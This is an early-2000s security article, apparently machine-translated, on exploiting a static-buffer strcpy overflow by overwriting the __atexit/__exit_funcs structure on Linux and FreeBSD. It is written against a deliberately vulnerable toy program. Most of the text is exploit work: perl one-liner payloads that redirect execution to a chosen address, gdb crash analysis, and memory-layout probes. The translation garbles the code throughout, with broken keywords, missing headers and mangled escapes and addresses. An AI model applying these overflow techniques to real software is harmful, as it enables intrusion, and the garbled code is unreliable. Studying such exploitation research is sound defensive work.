Complement with buffer overflow attacks by overlay __atexit
Creation time: 2001-07-20
Article attribute: original
Article Source:
http://www.xfocus.org
Article submission:
Alert7 (sztcww_at_sina.com)
Complement with buffer overflow attacks by overlay __atexit
Squiring: Alert7
Mail: alert7@21cn.com
Home:
http://www.xfocus.org
Preface:
If you have seen "Buffer attack by overwriting __atexit", please continue to watch
This article is finished, because .....
Content details:
Today, it revisits the WARNING3 translation. "Buffer attack by overwriting .dtors"
Try him on the Bleh.c on it with a static compilation.
[Alert7 @ww alert7] $ cat bleh.c
#include
#include
Static void bleh (void);
int
Main (int Argc, char * argv [])
{
Static u_char buf [] = "bleh";
IF (Argc <2)
EXIT (exit_failure);
STRCPY (BUF, Argv [1]);
Exit (exit_success);
}
Void
Bleh (void)
{
Printf ("goffio! / n");
}
[Alert7 @ww alert7] $ gcc -o bleh bleh.c -static
[Alert7 @ww alert7] $ objdump -s -j .dtors bleh
Bleh: File Format ELF32-I386
CONTENTS OF Section .dtors:
8078D08 ffffffff 00000000
Determine the address of the destructure in DTORS is 0x08078D08 4
[Alert7 @WW alert7] $ objdump --syms bleh | EGREP 'text. * bleh'
080481D8 L f .text 00000012 BLH
The address of the BLH function is 0x080481D8
[Alert7 @ww alert7] $ objdump -s -j .dtors -j .data bleh | grep bleh
Bleh: File Format ELF32-I386
80777A0 00000000 0C8D0708 00000000 626C6568 ............ bleh
String bleh's address is 0x80777a0 12
So the number of A is: 0x08078D08 4- (0x80777a0 12) = 0x1560 = 5472
It seems that everything is quite smooth, see if the attack can succeed.
[Alert7 @ww alert7] $ ./bleh `perl -e 'print" a "x 5472; print" / xd8 / x81 / x04 / x08 ";'`
Segmentation Fault (Core Dumped)
Why is this, or see which place in Core is wrong.
[Alert7 @ww alert7] $ GDB -Q BLH CORE
Core Was generated by `./bleh
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.Program terminated with signal 11, Segmentation fault.
# 0 0x80482a6 in exit (status = 0) at exit.c: 42
Exit.c: 42: No Such File or Directory.
(GDB) BT
# 0 0x80482a6 in exit (status = 0) at exit.c: 42
# 1 0x80481d0 in main ()
# 2 0x804827d in __libc_start_main (main = 0x80481a0
Argv = 0xBFFFE8A4, INIT = 0x80480b4 <_init>, fini = 0x806f2ec <_fini>,
RTLD_FINI = 0, stack_end = 0xbffe89c) at ../sysdeps/generic/libc-start.c:78
It turned out to be in an error in the exit function. Whether it will be associated with "Buffer attack by overwriting __atexit"
Because the __atexit variable is covered by the __atexit variable causes the EXIT function to cause the paragraph error. Let's go, look at us to see.
[Alert7 @ww alert7] $ GDB BLH -Q
(GDB) B EXIT
Breakpoint 1 at 0x8048298: file exit.c, line 40.
(GDB) R
Starting Program: / Home / Alert7 / Bleh
Breakpoint 1, Exit (status = 1) at exit.c: 40
EXIT.C: 40: No Such File or Directory.
(GDB) P __exit_funcs
$ 1 = (Struct EXIT_FUNCTION_LIST * 0X80777E0
Let's take these addresses as small as big.
String bleh's address is 0x080777ac
__exit_funcs' address is 0x080777E0
The address of the destructor in the DTORs is 0x08078d0c
Reduce a number of A so that it is possible to cover the address of __exit_funcs.
The address of the string bleh and the address of the __exit_funcs are 52 bytes.
[Alert7 @ww alert7] $ ./bleh `perl -e 'print" a "x 48; print" / xd8 / x81 / x04 / x08 ";'`
Everything is normal, because it has not yet been covered.
[Alert7 @ww alert7] $ ./bleh `perl -e 'print" a "x 49; print" / xd8 / x81 / x04 / x08 ";'`
Segmentation Fault (Core Dumped)
Override to a byte, let's take a look.
[alert7 @ww alert7] $ gdb -q bleh
(GDB) B EXIT
Breakpoint 1 at 0x8048298: file exit.c, line 40.
(GDB) R `perl -e 'print" a "x 49; print" / xd8 / x81 / x04 / x08 ";'`
Starting Program: / Alert7 / Bleh `Perl -e 'Print" A "x 49; Print" / xd8 / x81 / x04 / x08 ";'` Breakpoint 1, exit (status = 0) at Exit.c: 40
EXIT.C: 40: No Such File or Directory.
(GDB) P __exit_funcs
$ 1 = (Struct EXIT_FUNCTION_LIST * 0X80777E0
(GDB) X / 8X 0x80777E0
0x80777E0
0x80777f0
Constructs the above ATEXIT structure (this structure, please refer to the buffer overflow attack by overwriting __ATEXIT ")
For (p = __atexit; p; p = p-> Next)
For (n = p-> ind; - n> = 0;)
(* P-> FNS [N]) ();
The address of the next Atexit structure is 0x00000008, which is an unacceptable address, so the paragraph error is caused.
This also illustrates a problem, and the function of the ATEXIT () is executed before the destructor in the DTORs.
The above tests are performed on Linux, so the buffer overflow attacks on Linux by overwriting __ATEXIT.
Still it, the method is the same as in FreeBSD. Please refer to that article. "By overwriting __atexit into
Boarding buffer overflow attack ", I am very straightened" This attack is impossible in Linux, ",
I feel awkward.
Don't repeat the mistakes, let's take a look at this demonstration applet:
On Linux
[alert7 @ww alert7] $ cat test.c
#include
EXTERN VOID * __EXIT_FUNCS;
Int main (void)
{
Static Char BUF1 [2];
Static char buf [] = "bleh";
Static char scbuf [128];
Char * mabuf;
MABUF = (char *) Malloc (128);
Printf ("__EXIT_FUNCS AT% P / N", __exit_funcs;
Printf ("MalloCed at% P / N", MABUF);
Printf ("static at% p / n", & scbuf);
Printf ("Auto Val at% P / N", & Mabuf;
Printf ("static buf [] = /" bleh / "at% p / n", & buf);
Printf ("Static BUF1 AT% P / N", & BUF1);
Return 0;
}
[Alert7 @ww alert7] $ gcc -o test test.c -static -g
[Alert7 @ww alert7] $ ./test__exit_funcs at 0x80779A0
Malloced AT 0x8079C40
Static AT 0x8078F20
Auto Val at 0xBffFFFDC0
Static buf [] = "bleh" AT 0x807796C
Static BUF1 AT 0x8078F00
Take them from small to big
Static buf [] = "bleh" AT 0x807796C
__exit_funcs AT 0x80779A0
Static BUF1 AT 0x8078F00
Static AT 0x8078F20
Malloced AT 0x8079C40
Auto Val at 0xBffFFFDC0
On FreeBSD
BASH-2.05 $ CAT TEST.C
#include
Extern void * __atexit;
Int main (void)
{
Static Char BUF1 [2];
Static char buf [] = "bleh";
Static char scbuf [128];
Char * mabuf;
MABUF = (char *) Malloc (128);
Printf ("__ atexit at% p / n", __atexit);
Printf ("MalloCed at% P / N", MABUF);
Printf ("static at% p / n", & scbuf);
Printf ("Auto Val at% P / N", & Mabuf;
Printf ("static buf [] = /" bleh / "at% p / n", & buf);
Printf ("Static BUF1 AT% P / N", & BUF1);
Return 0;
}
BASH-2.05 $ GCC -O Test Test.c -static -g
BASH-2.05 $ ./test
__atexit at 0x8053060
Malloced at 0x8055000
Static AT 0x8052FE0
Auto Val at 0xBFFBEC
Static buf [] = "bleh" AT 0x805204c
Static BUF1 AT 0x8052FC0
Take them from small to big
Static buf [] = "bleh" AT 0x805204c
Static BUF1 AT 0x8052FC0
Static AT 0x8052FE0__atexit at 0x8053060
Malloced at 0x8055000
Auto Val at 0xBFFBEC
Ok, you have also seen it.
Static char buf [] = "bleh" is defined, the BUF address will be smaller than __exit_funcs,
It is possible to override __exit_funcs.
to sum up:
By overwriting __atexit, the buffer overflow attack does not lose a good method, good
Thinking, but truly implemented is universal. Because there are problems that need to meet the following two
condition:
1: It needs to be compiled with static.
2: Need to define the variable static char buf [] = "bleh",
Make the address of the variable less than __exit_funcs or (FreeBSD __ATEXIT).
These two requirements are more demanding, in general, may not find such a problem procedure.
